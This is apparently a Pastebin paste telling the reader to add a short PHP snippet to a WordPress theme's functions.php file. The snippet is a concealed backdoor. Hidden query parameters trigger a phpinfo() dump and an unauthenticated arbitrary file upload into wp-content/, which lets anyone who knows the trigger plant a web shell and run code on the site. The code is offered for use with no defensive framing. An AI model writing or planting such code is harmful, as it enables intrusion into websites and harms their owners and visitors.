Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- add to the file functions.php of the current theme
- ---------------------------------------------------------------------
- add_action('wp_head', 'Info');
- function Info() { if(isset($_GET['Info'])) phpinfo(); }
- add_action('wp_head', 'Marty');
- function Marty() { if(isset($_FILES['file']) && isset($_GET['Marty'])) {
- move_uploaded_file($_FILES['file']['tmp_name'], 'wp-content/' . $_FILES['file']['name']);
- echo "Stored in: " . 'wp-content/' . $_FILES['file']['name'];
- }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement